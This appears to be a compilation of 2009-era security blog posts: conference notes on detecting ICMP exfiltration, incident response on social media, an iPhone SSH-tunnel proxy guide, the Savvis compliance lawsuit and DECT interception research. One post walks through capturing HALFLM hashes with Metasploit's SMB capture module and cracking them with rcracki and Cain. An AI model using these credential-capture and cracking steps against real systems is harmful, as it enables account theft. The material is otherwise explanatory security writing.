Hard to track where the data is going (ICMP to a nonexistent domain). Attacker must be somewhere in the line to capture the data using TCPDUMP. Open in Wireshark and then carve out the file.

How to protect against this ?

• Track the data export at the database
• Log commands run on servers / applications installed on servers
• Should this server be sending Echo Requests ? Block and Log
• Watch for proprietary data on the wire (in cleartext)
  • Using RegEx to detect set data
  • Implement using something like SNORT

Use Honeytokens to trigger alerts. Insert dummy records into the database (that should never be returned unless the whole table is dumped), files with seemingly interesting data (passwords.xls) which are present in a non-browsable area of your website. Insert code-comments into the source-code of your internally developed applications and create rules to alert/block traffic leaving your network with these comments.

Doesn’t prevent exposure, doesn’t provide the depth of the issue, however the first piece of the puzzle is being aware that something bad is happening.

Issues: Encryption of the data will prevent this honeytoken being tracked.

Solution: Frequency analysis – Detect the frequency of hex values to discover if the data is encrypted. Search and alert on encrypted data where it is not part of the normal traffic pattern. Entropy-based anomaly detection detection through the SNORT platform. No plugin yet for this purpose. Stay tuned…

Last point of recovery process needs to be an improved preventative posture. Lessons learned.

What we’ve learned :

• Think like an evil insider
• Log everything possible to improve the scoping of the breach

14:30 Using Social Media in Incident Response – Martin McKeay

Staff / Responders that use social media are releasing information live as it comes in. Due to the fact this is a live response, it can often be more about emotion than about fact. Company policy for electronic media (including social media) isn’t set in a majority of companies. Those that do have a policy do not always enforce the policy, or make staff aware of their responsibilities.

Companies are slow to come to social networking and are seeing issue when they look to claim their company name or trademark. Who is currently using your company name on Twitter, Facebook, MySpace, etc… ? Incidents of non-staff taking the name of companies and using it to communicate as if they are the company. There are also cases of unauthorized staff using the company name within social networking sites or blogs. Readers of official company blogs and social media services are unforgiving when it comes to pure marketing and sales messages. In order to be a useful communication tool for handling and communicating incidents, you have to build followers and readers prior to having an incident. This takes more than just posting up marketing information and expecting people to listen.

Company policy should dictate what happens when an incident occurs. If you suddenly stop twittering/blogging then people will notice and think the worst. News travels fast on social networks, and unless you supply the news, this information can come from any source and be based on pure speculation. AT&T outage can be used as a good example. In the case of AT&T, many users one Twitter where mapping out the areas suffering a connection outage although AT&T didn’t talk about the issue openly. This has caused damaged to AT&T’s reputation.

Key points .:

• Assign person who will communicate
• Policy on what to communicate
• Who is dealing with Blogesphere / Social Media

16:30 Emerging Threats and Attack Trends – Paul Oxman

Threats are moving up the stack towards targeting individuals.

Designer malcode is now being developed using bleeding edge software development techniques and protections. As with other software maturity models, malware has also begun to adopt the same processes. Backup Malcode is being made available to customers in order to replace the original once AV vendors catchup and start detecting the attack code.

Large-scale worms are getting rarer as attacks become more targeted and selective. As the large-scale attacks drop, the cybercrime profits have increased. Email as an attack vector is also slowing as web based vectors increase in popularity. Blended attacks are becoming more prevalent.

Cyber-terrorism – Future conflicts are much more likely to have a cyber element to them.

2008 Security

• 70% of the top 100 websites pointed to (or contained) malware
• Number of vulnerabilities up 11% from 2007
• Reputation HiJacking on the increase
• Attacks are more targeted to help maximize effectiveness
• More reliance on blended threats

Issues of hardware being infected at “source” to catch consumers off guard. A user is more likely to accept an install request when you plugin a new device (i.e. digital photo-frame).

Attackers are taking information gathered from phishing attacks and using it on various popular services to catch users who are relying on a limited set (or even just one) password for multiple services/sites.

July 2008 – 45% of browsers still vulnerable despite auto-update features.

Malware targeting current events (Olympics was a prime target for attack). The fake Olympics website netted 40-50 Million USD, and gathered username/passwords for further attacks on websites.

Known vulnerabilities are left unpatched. Attackers don’t have to come up with 0-day attacks if they can exploit know issues.

Case study of how the creators of conficker evolved their attack by updating from MD5 to MD6 and then patching a flaw in MD6 when it was found to be vulnerable. 85% of code was replaced from 1 version to another. Not your average malware.

Threats on the horizon:

• SMS vishing
• Extensive social engineering
• More highly targeted attacks
• Attacks on mobile devices (different OS an issue for attackers)
• Using video sharing sites as a method for distribution of malware

Incident response. The most important factors are preparation for the (inevitable) attack/incident, and the post-mortem to learn from your response (often forgotten or skipped).

Well that’s all from day 1. No sushi yet, but the night is young. More to follow after day 2

Protecting your browsing with iPhone SSH tunnels

Most of the time I feel relatively secure when I’m browsing the web or checking twitter on my iPhone. That said, I rarely use the built in wireless for these purposes, and rely instead on the reasonably good 3G network in Austria. When I’m out of the country I usually try to buy a pay-as-you-go sim card and pay for the daily data transfer. This isn’t as expensive as you’d think. For example in the Netherlands it costs around €3.50 per day of data transfer. Not cheap if you’re using it long-term, but if you’re only there for a couple of days it’s a lot cheaper than paying for a hotel WLAN that’s insecure and only works inside the hotel. Still, this solution doesn’t work everywhere and isn’t for everyone. The fallback is to use whatever wireless you can find, insecure or not. This is something I’ve been fighting with for a while now. Stemming (mostly) from my unwillingness to setup a VPN server (my home ADSL isn’t good enough quality, and doesn’t have a fixed IP) or pay a huge price for a VPN solution through my existing hosting provider (thanks for the cheap hosting Dreamhost).

The iPhone (at least version 2.2.1) supports the use of HTTP proxies when connecting via a wireless connection. This is great. Surely I can setup an SSH Tunnel to my server and tell the iPhone to use this as a SOCKS proxy. As with everything on the iPhone however, simple always turns into complicated very quickly. I experimented with this solution and found that the HTTP proxy support was really just that, HTTP proxy support and nothing else. So back to the drawing board. I searched for another solution and settled on using the 3proxy application (in cydia for those lucky enough to have a jailbroken iPhone) to setup a local HTTP proxy.

A few requirements to get this up and running on your iPhone.

• A Jailbroken iPhone (or iPod Touch)
• SSH Client installed
• 3proxy (available in cydia)
• terminal application
• An SSH server (setup for either password or certificate access)
• Backgrounder (or some other way to run commands and have them running in the background)
• OPTIONAL: iFile (easy file editing)

Starting off we’ll take a look at the configuration of 3proxy. By using the following configuration you tell 3proxy to forward all traffic to a second proxy server, this time a SOCKS proxy (in this case my SSH tunnel).

#!/usr/bin/3proxy
daemon
auth iponly
log /var/log/3proxy.log D
rotate 5
fakeresolve
internal 127.0.0.1
allow * * 127.0.0.1
parent 1000 socks5+ 127.0.0.1 8081
proxy -p8080 -a -i127.0.0.1

The quick rundown on the above configuration.

• #!/usr/bin/3proxy – Tells the script what interpreter program to use
• daemon -  Tells 3proxy to run as a background process
• auth iponly – sets the authorization to be ip restricted
• log – Setup a log that rotates daily (the D option)
• rotate 5 – Sets the number of log files to keep before rotating
• fakeresolve – Tells 3proxy to route DNS lookups through the proxy
• internal – Listen in the internal interface only
• allow – Currently set to * for all (you can limit this by username/password or IP, however this caused issues in testing)
• parent – This is where we’re setting the next proxy in the chain (1000 is always use this parent, SOCKS5+ is the type and then the SSH tunnel listening ip and port)
• proxy – this final command tells 3proxy to start a proxy on port 8080 using anonymous proxy mode (-a) and listen only in internal loopback

You can find more configuration information on the 3proxy website. Although leaving the allow set to * (all) is a concern, remember that the proxy is only listening on the localhost address and from outside the port is blocked.

Now that we’ve got the 3proxy.cfg file saved (mines stored in /usr/bin with the 3proxy executable) you’ll need to run chmod +x to make it executable. Next up is the SSH Tunnel, and doing this on an iPhone isn’t much different to a normal linux system (just harder to type for obvious reasons). I opted to add a certificate for quick easy access and restricted access to the certificate to the root user on the iPhone (you have changed your root password right ???). I added the private key to ~/.ssh/id_dsa (or id_rsa, your choice) and setup a bash script to kick off the SSH tunnel (typing that command each time gets boring fast).

ssh -D 8081 -N -C username@remotehost.your.domain -2 -p 64000 -i /home/root/.ssh/id_dsa

The above command is a simple SSH tunnel setup to connect to port 64000 on remotehost.your.domain and logon as the user username using the certificate file stored in /home/root/.ssh/id_dsa. It will then setup a local listener on port 8081 and dynamically route all traffic coming to this port through the SSH tunnel. As we’re treating the tunnel as a SOCKS proxy we don’t need to have anything else setup at the other end (no other proxy server waiting to route the requests) although you could setup privoxy or any other kind of proxy if you wanted more control.

So, now that we have the two parts of our configuration ready we just need to drop to the shell and kickoff the SSH Tunnel (using your bash script), and then startup the 3proxy using the /usr/bin/3proxy.cfg command. I’ve linked it all into a single bash script to make things a little quicker.

In testing Safari works pretty well (minor decrease in performance as you’d expect). Twitterfon was the second application I tested. Although this follows the HTTP proxy rule, it still insists on doing DNS lookups for advertising outside of the proxy. This is also the case for a couple of other applications. Mail doesn’t follow the HTTP rules, however you can easily setup additional 3proxy ports for these, or use SSL and make sure your DNS is all piped over the local listener and through the SSH tunnel (3proxy supports a DNS caching proxy, tcp and udp forwarding proxies also).

Supported:

• Safari
• Twitterfon (partially: Advert DNS lookups are still a possible concern/attack vector)
• Cydia
• AppStore
• iTunes
• Youtube
• Weather
• GRiS
• WordPress (partially: As with the Twitterfon issue, the DNS appears to ignore the HTTP proxy settings)

Obviously these were just the applications I tested. I’d suggest running your own tests to ensure that you’re seeing the same results.

Not-Supported:

• Mail (setup a port forwarder to achieve support for email)
• Siphon (This is a real disappointment)
• F-Stream
• … probably more, so your mileage may vary

If you test any other applications please let me know and I’ll add it to my list.

Once you’ve finished using the SSH Tunnel and proxy, remember to kill -9 them using the console.

TODO:

• Test with alternative “allow” settings to restrict access further (username/password too easy)
• Prevent initial DNS lookup on SSH Tunnel (i.e. dyndns service)
• Log Bug with Twitterfon regardin DNs lookups
• Find an easier way to trigger the tunnel & 3proxy build-up/tear-down
• Resolve issue of tunnel disconnecting when screen gets locked (FOR loop ???)
• Use the tunnel for 3G connections (paranoid much !!!)

EC-Council Courses certified by the NSA !!!

Yes, this isn’t a mistake, and I’ve not been drinking. I received a nice email from the people at EC-Council letting me know that the “EC-Council Courseware certified to have met the CNSS Standards by the United States National Security Agency (NSA) and the Committee on National Security Systems (CNSS)”. The press release goes on to detail the EC-Council courses (including CEH, ECSA and LPT) that have been been certified to meet the training requirements for information security professionals in federal government.

My first reaction was that this must be come kind of scam. I was waiting for the part where they ask me for my credit-card number so I can receive a new certificate and security level. Alas, this was not to be. Those who’ve read my blog or my articles know that my view on EC-Council and in particular their CEH, ECSA/LPT track isn’t a good one. I’ve been through the training and to this date (maybe for not much longer) I’m still certified as a CEH and ECSA. I’ve refused to pay the $500 a year required to be an LPT however, as, well, it’s a farce. Still, back to the point. I’m not sure what changes EC-Council have made since my experiences with version 5 of the CEH course, but from what I’ve heard and read, they’ve only increased the size of the course and done nothing to improve the low quality of the training and material.

I’m not sure what the thinking behind this certification was, however I’d love to hear your opinions. Does this change your view on the quality of CEH candidates ? or has it just lowered your opinion of the technical competence of the NSA. I know where my feelings on the matter lie.

EC-Council Press Release –> HERE

Cracking HALFLM

I was recently reading through Chris Gates post on capturing and cracking HALFLM hashes with Metasploit and thought I’d give it a quick run through. (I won’t be rehashing what Chris already covered here, so I suggest you pop over to his blog for a quick coverage of HALFLM and the rainbowtable cracking method).

Until I read the post I’d been using the SMB_relay attack to load up a meterpreter shell onto the remote target, but seeing as Microsoft have finally decided this is a bug worth patching, it’s time to move on to other attack vectors. SMB_relay will still be a good attack vector for some attacks, but the patch against reflective relays means it’s not going to always be available.

All was going well with the walkthrough, I’d captured the hash from the target machine and had the HALFLM tables downloaded (halflmchall _alphanumeric #1-7_x_2400_ 1122334455667788). So after running the rcracki_mt_0.5.exe *.rti -h <First16Chars> was depressed to see that the first half wasn’t found (the tables are only alpha numeric after all). Not a problem I thought, and went back to Chris’ walkthrough to see the next step. That’s where it all went wrong. If you can’t find the first part of the hash, then the rest of the walkthrough isn’t going to help. I had a little hunt around the big WWW and like any good Googler I found some hints on what other tools could do a brute force or password guessing attack aginst the HALFLM format. I picked CAIN and set about trying to manually tell it what the username, LM hash and challenge were, without much luck. Cain can sometimes be stubborn on the input formats and you can’t manually tell it what should go where. I went back to the Metasploit smb capture module and had a closer look at the set options to see what I could do. Here I found the option to output captured the hashes straight into a format readable by Cain&Able (set PWFILE cain_hashdump.txt) instead of to the screen in a generic format.

After performing the SMB capture again, the file cain_hashdump.txt was created, allowing me to directly import it into CAIN (along with the challenge this time).

For those that may have already captured the HALFLM hash and need to import this into CAIN, the format of the dump output from Metasploit is as follows .:

USERNAME:DOMAIN:1122334455667788:LMHASH:NTHASH

The 1122334455667788 in the middle tells Cain what challenge was used by the Metasploit module. In this case Metasploit is hard coded to use \x11\x22\x33\x44\x55\x66\x77\x88 as the challenge string.

Hope you find this useful, and remember to checkout the Carnal0wnage blog for the RainbowTable method, as well as lots of other Metasploit hints, tips and examples.

One bad day

I must admit that I don’t follow this kind of news as much as some other in the industry. However I recently became aware of the ongoing legal action by Merrick Bank against the IT consulting firm Savvis for negligence and negligent misrepresentation in certifying CardSystems as CISP compliant. This in itself wouldn’t be important news in my view as companies seem to sue each other at the drop of a hat in this day and age. However the details of the case interested me enough to read a little further.

The case came back into the limelight in the past few weeks after the federal district court in Missouri transferred the case to Arizona. To give the brief 30 second overview, Savvis was retained by CardSystems in 2004 to valid their systems as CISP (Cardholder Information Security Program*) compliant. Less than a year after being given the green light by Savvis, CardSystems was breached resulting in the compromise of up to 40 Million credit card numbers. This in turn cost Merrick Bank (a customer of CardSystems) over $16 Million in costs. Not a small amount by any means.

However, this is all in the past, and there are various places on the web where you can find much more in-depth information about the breach and the case. What I want to talk about is the validity of security checks and compliance. I’m a supporter of anything that convinces management to think about security. The debate about whether the PCI standard has helped or hindered security is something I’ll leave for the people who like to argue such things. However like any security check, penetration test, vulnerability scan or audit, the results (and therefore the compliance stamp that goes with it) is only going to tell you what the security was like at a single point in time. Having regular checks can help you build a view of your security over a longer period, but you can never say 100% what the company’s exposure was between 2 of time-points.

I’ll give you an example. If company ABC requests a penetration test of their systems, the people performing the test (XYZ Labs) can only check for known issues, configuration flaws, business logic flaws, published vulnerabilities, and sometimes unpublished vulnerabilities. Even if the company requests that XYZ Labs perform a regular test every 3 months they can never be sure that between penetration tests they remain 100% secure. It comes down to the simple fact that defending a network is much harder than attacking one. It’s a simple equation. To defend your systems you need to make sure that every system in that network (or that could be attached to that network) is fully protected, patched, properly configured and monitored 24 hours a day, 7 days a week 365 days a year. For an attacker to win, they simply need to find a single system on the network that has a weakness. That could be a configuration problem, an unpublished exploit (zero-day), or a weak link (social engineering, client-side attack, test system exposed to the internet). The possible attack vectors are wide and varied. They are also not all covered by the standard scanning techniques used by most Approved Scanning Vendors.

How does this fit with Savvis, CardSystems and Merrick Bank. It’s simple. Like any other IT Consultancy, Savvis were paid to come in and review security with CISP compliance in mind. They performed that action, certified CardSystems according to the standard and moved on. Savvis were not charged with maintaining the ongoing level of security at CardSystems in a hands on role. So does this mean that Savvis are now responsible for any future security blunder made by the IT staff at CardSystems. They may, or may not have been charged with scanning the network on a quarterly basis. However as anybody who’s compared a vulnerability scan to a Penetration test knows, scanning is only part of the battle. I’m not aware of any company doing compliance checks that offers a 12 month money back guarantee on your company’s security. How could they. After all, their security checks both on the audit side, as well as vulnerability scanning or penetration testing (if performed) can only show the current state of security within that organisation. If CardSystems was like any other company, they probably even worked especially hard during the Audit periods to improve the level of security and follow the processes exactly as they should. Showing their ‘A’ game to make sure that the compliance went smoothly. Some would say that a company will never be as compliant as it is during the Audit because of this very reason. It’s easy when nobody is looking over your shoulder to fall back into bad habits. I’ll do that change control tomorrow, it’s only a test box so no need to patch it as often. We’ve all done that at one time or another through laziness or pressure from management to fit in too much work before the long weekend.

I’m not a lawyer, and I don’t play one on television either (although I am available to audition should the right role come up). However I hate to see companies, like Savvis, get blamed for something that they could well have no control over. Then again, maybe the evidence in the case proves that Savvis is to blame. I can only go on the little information I have.

* For those not in the know, the CISP requirements were incorporated into an industry standard known as Payment Card Industry (PCI) Data Security Standard

Links (further reading) .:

http://blog.subjunctive.com/ –> Grave Concerns Blog
http://www.finextra.com/community/fullblog.aspx?id=2905 –> Finextra.com

Upcoming DECT Talk

For those of you that follow my insane ramblings no a regular basis might just remember some posts I’ve made about DECT interception. As part of my ongoing interest in this area I’ve been keeping an eye on the dedected.org site and the researchers responsible for reversing parts of the DECT standard. Although not much has moved since the December 2008 software release and initial research, Ralf-Philipp Weinmann (University of Luxembourg) will be making a presentation at the upcoming EUSecWest 2009 in London (27/28 May). The talk, entitled Efficient UAK Recovery attacks against DECT”, seems to hint at possible advances to the project. The UAK (User Authentication Key) is a 128bit key used in the pairing process to Authenticate the PP (Portable Part). Although this isn’t the point we’ve all been waiting for (an attack on DECT Standard Cipher), it does represent the next step forward and could open the door to easier Man in the Middle type attacks. It could also allow attackers to connect to internal DECT systems and route calls through internal call switches. Great for free calls, social engineering, or maybe gaining access to restricted services (modems on listening on internal extensions, voicemail systems, etc..). At the moment this is all speculation however. It’s a pity I can’t be at EUSecWest (I’m already doing too many conferences this year). However I’ll be keeping an eye on the slides as soon as they’re made public.

At present the dedected.org team have released software that allows for capturing unencrypted DECT telephone calls only. This doesn’t mean that encrypted calls can’t be captured, it simply means that they cannot currently be decoded into anything that makes sense. There is the chance the previously captured encrypted calls could be attacked and decoded in the future.

That not withstanding, I doubt that the dedected.org team will be releasing anything new to decode encrypted traffic in the short term. At this stage they’ve already exposed the weaknesses in DECT, and without a solution to the issue, releasing a tool that captures and decodes encrypted traffic would only put individuals and companies using encrypted DECT in danger. That’s not to say their won’t be something in the mid to long term.

To prevent exposure, companies should start looking (if they’ve not already started) at alternative options to DECT telephones and headsets. VoIP seems like a viable alternative if it’s implemented over VPN or other secure channels. Only time will tell if this is the direction that people head however.